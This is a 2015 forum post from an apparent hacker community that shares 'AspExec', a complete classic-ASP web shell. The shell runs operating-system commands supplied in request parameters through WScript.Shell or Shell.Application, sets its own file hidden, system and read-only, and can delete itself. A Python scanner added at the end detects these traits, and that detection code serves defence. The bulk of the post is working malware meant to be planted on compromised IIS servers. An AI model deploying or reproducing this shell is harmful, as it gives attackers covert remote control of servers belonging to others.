
Finished aspexec - modeled on the aspx version, with custom cmd parameters

Posted on 2015-10-2 14:02:31
  1. <object runat=server id=shell scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
  2. <%if err then%>
  3. <object runat=server id=shell scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
  4. <% end if %>
  5. <%
  6. 'hidded shell
  7. dim file_name
  8. file_name = Server.MapPath("./") & Replace(Request.ServerVariables("Script_Name"),"/","")
  9. set fso = createobject("scripting.filesystemobject")
  10. set file = fso.getfile(file_name)
  11. file.attributes = 1+2+4
  12. %>
  13. <%
  14. 'exec command
  15. Dim path,parms,method,result
  16. path=Trim(Request("path"))
  17. parms=Trim(Request("parms"))
  18. method=Trim(Request("submit"))
  19. result=""
  20. If path="" Then path="C:\WINDOWS\system32\cmd.exe"
  21. If parms="" Then parms="/c "
  22. If method="wscript.shell" Then
  23. result=shell.exec(path&" "&parms).stdout.readall
  24. Elseif method="shell.application" Then
  25. set newshell=createobject("shell.application")
  26. newshell.ShellExecute path,parms,"","open",0
  27. result="Shell.application Execute OK."
  28. Elseif method="self.delete" Then
  29. file.attributes = 0
  30. fso.deletefile(file_name)
  31. set fso = nothing
  32. End If
  33. %>
  34. <html>
  35. <head>
  36. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  37. <meta http-equiv="pragma" content="no-cache">
  38. <title>AspExec</title>
  39. <style>
  40. textarea{resize:none;}
  41. table.gridtable {
  42. font-family: verdana,arial,sans-serif;
  43. font-size:11px;
  44. color:#333333;
  45. border-width: 1px;
  46. border-color: #666666;
  47. border-collapse: collapse;
  48. }
  49. table.gridtable th {
  50. border-width: 1px;
  51. padding: 5px 8px;
  52. border-style: solid;
  53. border-color: #666666;
  54. background-color: #dedede;
  55. }
  56. table.gridtable td {
  57. border-width: 1px;
  58. padding: 5px 8px;
  59. border-style: solid;
  60. border-color: #666666;
  61. background-color: #ffffff;
  62. }
  63. a:link{text-decoration:none; color:#111;}
  64. a:visited {text-decoration:none; color:#111;}
  65. a:hover {text-decoration:none; color:#111;}
  66. a:active {text-decoration:none; color:#111;}
  67. </style>
  68. </head>
  69. <body>
  70. <br/>
  71. <form method="post" action="<%=Request.ServerVariables("SCRIPT_NAME")%>" id="submitf">
  72. <table class="gridtable" width="100%" style="FILTER: progid:DXImageTransform.Microsoft.Shadow(color:#f6ae56,direction:145,strength:15);">
  73. <tr><td colspan="2" align="center"><h2><a href = "http://le4f.net/" target="_blank">AspExec</a></h2></td></tr>
  74. <tr>
  75. <td>
  76. <table class="gridtable">
  77. <%
  78. Dim theComponent(7)
  79. theComponent(0) = "Scripting.FileSystemObject"
  80. theComponent(1) = "WScript.Shell"
  81. theComponent(2) = "WScript.Shell.1"
  82. theComponent(3) = "WScript.Network"
  83. theComponent(4) = "WScript.Network.1"
  84. theComponent(5) = "shell.application"
  85. theComponent(6) = "shell.application.1"
  86. Function IsObjInstalled(strClassString)
  87. On Error Resume Next
  88. IsObjInstalled = False
  89. Err = 0
  90. Dim xTestObj
  91. Set xTestObj = Server.CreateObject(strClassString)
  92. If -2147221005 <> Err Then
  93. IsObjInstalled = True
  94. Else
  95. IsObjInstalled = False
  96. End if
  97. Set xTestObj = Nothing
  98. Err = 0
  99. End Function
  100. %>
  101. <tr><th colspan="2" align="center">Component</th></tr>
  102. <%
  103. Dim i
  104. For i=0 to UBound(theComponent)-1
  105. If IsObjInstalled(theComponent(i)) Then
  106. Response.Write "<tr><td width='80'>" & theComponent(i) & "</td><td><font color=""green"">√</font></td></tr>" & vbCrLf
  107. Else
  108. Response.Write "<tr><td width='80'>" & theComponent(i) & "</td><td><font color=""red"">×</font></td></tr>" & vbCrLf
  109. End if
  110. Next
  111. %>
  112. </table>
  113. </td>
  114. <td width="100%">
  115. <DIV align=center
  116. style='
  117. color: #990099;
  118. background-color: #E6E6FA;
  119. width: 100%;
  120. height: 180px;
  121. scrollbar-face-color: #DDA0DD;
  122. scrollbar-shadow-color: #3D5054;
  123. scrollbar-highlight-color: #C3D6DA;
  124. scrollbar-3dlight-color: #3D5054;
  125. scrollbar-darkshadow-color: #85989C;
  126. scrollbar-track-color: #D8BFD8;
  127. scrollbar-arrow-color: #E6E6FA;
  128. '>
  129. Path:<input type="text"  value=<% Response.Write path %>   name="path"  style='width:100%;'>
  130. Parms:<textarea name="parms" style='width:100%;height:70%;'><% Response.Write parms %></textarea>
  131. </DIV>
  132. <input type="submit" name= "submit" value="wscript.shell">
  133. <input type="submit" name= "submit" value="shell.application">
  134. <input type="submit" name= "submit" value="self.delete">
  135. <lable>Current Dir : <%response.write request.servervariables("APPL_PHYSICAL_PATH")%></lable>
  136. </td>
  137. </tr>
  138. <tr><th colspan="3" align="center">Result</th></tr>
  139. <tr><td colspan="3" align="center"><textarea name="result" style='width:100%;height:270px;'><% Response.Write result %></textarea></td></tr>
  140. </table>
  141. </form>
This is what it looks like

On x64 it looks like this

http://www.binghesec.com/wp-content/uploads/2015/08/123549654llcha-7.png

OK, solved perfectly

JSP version: https://www.chinabaiker.com/thread-1596-1-1.html
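For defenders reviewing IIS web roots, the traits visible in the script above (the two server-side object CLSIDs, the attribute value 1+2+4, and request parameters flowing into `shell.exec` or `ShellExecute`) can be turned into a static check. The Python below is an added example, not part of the original post; `scan_asp`, the finding names and the sample text (a few lines quoted from the post) are constructed for illustration.

```python
import re

# CLSIDs quoted from the <object runat=server> tags in the post above.
CLSIDS = ("72C24DD5-D70A-438B-8A42-98424B88AFB8",
          "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B")

# A variable assigned from anything that reads the Request object.
ASSIGN = re.compile(r"^\s*(\w+)\s*=\s*(.*\bRequest\b.*)$", re.I)
# Process launch via obj.exec(...) or obj.ShellExecute args...
EXEC_CALL = re.compile(r"\.exec\s*\((.*)\)|\bShellExecute\s+(.*)", re.I)
# FileSystemObject attributes 1+2+4 = ReadOnly + Hidden + System.
HIDE_ATTR = re.compile(r"\.attributes\s*=\s*1\s*\+\s*2\s*\+\s*4", re.I)


def scan_asp(source):
    """Return a sorted list of finding names for one classic-ASP source text."""
    findings, tainted = set(), set()
    for line in source.splitlines():
        low = line.lower()
        if "runat" in low and any(c.lower() in low for c in CLSIDS):
            findings.add("server-side-shell-object")
        if HIDE_ATTR.search(line):
            findings.add("sets-hidden-system-readonly")
        m = ASSIGN.match(line)
        if m:
            tainted.add(m.group(1).lower())  # remember request-derived variable
        call = EXEC_CALL.search(line)
        if call:
            args = (call.group(1) or call.group(2) or "").lower()
            names = set(re.findall(r"\w+", args))
            if names & tainted or "request" in names:
                findings.add("request-data-reaches-process-launch")
    return sorted(findings)


# Constructed sample: lines quoted from the post, without the forum numbering.
SAMPLE = r'''<object runat=server id=shell scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<%
file.attributes = 1+2+4
path=Trim(Request("path"))
parms=Trim(Request("parms"))
result=shell.exec(path&" "&parms).stdout.readall
%>'''

# Constructed benign page: reads a request value but never launches a process.
BENIGN = 'name = Trim(Request("name"))\nResponse.Write Server.HTMLEncode(name)'

if __name__ == "__main__":
    print(scan_asp(SAMPLE))
    print(scan_asp(BENIGN))
```

The check is line-based, so it misses statements split across lines or launch calls hidden behind string building; treat a hit as a reason to inspect the file, not as a verdict.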


© 2012-2015 Baiker Union of China.